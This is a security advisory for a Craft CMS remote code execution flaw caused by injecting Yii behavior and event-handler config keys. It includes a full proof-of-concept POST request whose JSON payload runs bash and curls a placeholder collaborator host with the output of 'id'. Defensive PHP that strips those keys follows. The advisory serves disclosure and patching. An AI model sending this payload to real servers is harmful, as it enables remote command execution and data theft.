Potential authenticated Remote Code Execution via malicious attached Behavior

Moderate
angrybrad published GHSA-qrgm-p9w5-rrfw Apr 27, 2026

Package

composer craftcms/cms (Composer)

Affected versions

>= 4.0.0, < 4.17.12
>= 5.0.0, < 5.9.18

Patched versions

4.17.12
5.9.18

Description

We identified a vulnerability in the latest version of Craft CMS: an input-handling flaw in a Yii object-creation path lets any authenticated user inject malicious object configuration and execute arbitrary commands on the server. Yii's dynamic object configuration, as used by Craft CMS, lets the application build objects from a configuration array, and special keys in that array select the class to instantiate, its constructor arguments, and the behaviors or event handlers to attach.

This is largely a continuation of GHSA-255j-qw47-wjh5, but through a different path that was not mitigated in the original.

The request-controlled condition.fieldLayouts data is converted into a live FieldLayout object without passing through a Component::cleanseConfig() boundary. Because Craft configures models before calling parent::__construct(), attacker-controlled special config keys (such as "as <name>" and "on <event>") take effect during object creation, and FieldLayout initialization then triggers an event in the same request, so the injected handler runs immediately.

This appears to be another variant of the recent object-config / behavior-injection bug family, but via the condition / field layout hydration path.

We were able to reproduce the attack as any authenticated user by issuing a POST request to /admin/actions/element-search/search with the following JSON. Other routes can be exploited in the same way, including the rest of the element-indexes actions that pass through the same beforeAction() path. The payload makes the web server user run curl against the attacker-chosen server, with the output of the command "id" appended to the request path:

POST /admin/actions/element-search/search HTTP/2
Host: hostnamehere
Cookie: CraftSessionId=...; 1234123412341234_identity=...; CRAFT_CSRF_TOKEN=...;
Content-Length: …
User-Agent: Mozilla/5.0
X-Csrf-Token: ...
Accept: application/json
Content-Type: application/json

{
  "elementType": "craft\\elements\\Category",
  "siteId": 1,
  "search": "",
  "condition": {
    "class": "craft\\elements\\conditions\\ElementCondition",
    "elementType": "craft\\elements\\Category",
    "fieldLayouts": [
      {
        "as rce": {
          "__class": "yii\\behaviors\\AttributeTypecastBehavior",
          "__construct()": [
            {
              "attributeTypes": {
                "typecastBeforeSave": [
                  "Psy\\Readline\\Hoa\\ConsoleProcessus",
                  "execute"
                ]
              },
              "typecastBeforeSave": "/bin/bash -c \"curl https://yourcollaboratorservergoeshere/`id`\""
            }
          ]
        },
        "on *": "self::beforeSave"
      }
    ]
  }
}
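As an added example (not code from the advisory, Craft CMS or Yii), the standalone PHP below models the boundary the advisory says is missing: a hypothetical cleanseConfigStrict() helper that recursively strips the keys Yii treats specially (__class, __construct(), "as <name>", "on <event>") from untrusted request data before it can reach Yii::createObject() or a model constructor, and reports where they were found. It runs against a shortened copy of the condition object from the request above. The helper name, the example.invalid host standing in for the collaborator server, and the choice to leave a plain "class" key for the caller to allowlist are assumptions; Craft's own Component::cleanseConfig() is the project's implementation and may differ.

```php
<?php
declare(strict_types=1);
// Added example, not code from the advisory, Craft CMS or Yii.
// cleanseConfigStrict() is a hypothetical helper that models the missing
// boundary: untrusted request data is stripped of the keys that
// Yii::createObject() and yii\base\Component::__set() treat specially
// before it is used to build a FieldLayout (or any other object).

/**
 * True for keys that change what gets built rather than setting a plain
 * property: "__class" and "__construct()" are honoured by Yii::createObject(),
 * and Component::__set() turns "as <name>" into an attached behavior and
 * "on <event>" into an event handler.
 */
function isDangerousConfigKey(string $key): bool
{
    return $key === '__class'
        || $key === '__construct()'
        || str_starts_with($key, 'as ')
        || str_starts_with($key, 'on ');
}

/**
 * Recursively drop dangerous keys from $config and return the cleaned copy.
 * Recursion is the point: in the advisory's payload the "as rce" and "on *"
 * keys live inside condition.fieldLayouts[0], not at the top level.
 * Dotted paths of removed keys are appended to $removed for logging.
 * A plain "class" key is left alone here on the assumption that the caller
 * validates it against an allowlist of expected condition classes.
 */
function cleanseConfigStrict(array $config, array &$removed, string $path = ''): array
{
    $clean = [];
    foreach ($config as $key => $value) {
        $here = $path === '' ? (string) $key : $path . '.' . $key;
        if (is_string($key) && isDangerousConfigKey($key)) {
            $removed[] = $here;
            continue;
        }
        $clean[$key] = is_array($value)
            ? cleanseConfigStrict($value, $removed, $here)
            : $value;
    }
    return $clean;
}

// Constructed sample: the "condition" object from the request above, shortened.
// example.invalid stands in for the attacker's collaborator host (assumption).
$untrusted = json_decode(<<<'JSON'
{
  "class": "craft\\elements\\conditions\\ElementCondition",
  "elementType": "craft\\elements\\Category",
  "fieldLayouts": [
    {
      "as rce": {
        "__class": "yii\\behaviors\\AttributeTypecastBehavior",
        "__construct()": [
          {"typecastBeforeSave": "/bin/bash -c \"curl https://example.invalid/`id`\""}
        ]
      },
      "on *": "self::beforeSave"
    }
  ]
}
JSON, true, 512, JSON_THROW_ON_ERROR);

$removed = [];
$safe = cleanseConfigStrict($untrusted, $removed);

// After cleansing, fieldLayouts[0] is an empty array and $removed lists
// "fieldLayouts.0.as rce" and "fieldLayouts.0.on *".
print_r($removed);
print_r($safe);

if ($removed !== []) {
    // A legitimate client never sends these keys, so a real handler should
    // log and reject the request instead of proceeding with the cleaned copy.
    fwrite(STDERR, "special config keys found in request body, reject\n");
}
```

Run it with php on the command line; the two print_r() calls show that the behavior and event-handler entries were found two levels down, which is why a top-level-only check on the condition array would not have caught this payload.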

References

ab85ca7

Severity

Moderate

CVE ID

CVE-2026-44011

Weaknesses

No CWEs

Credits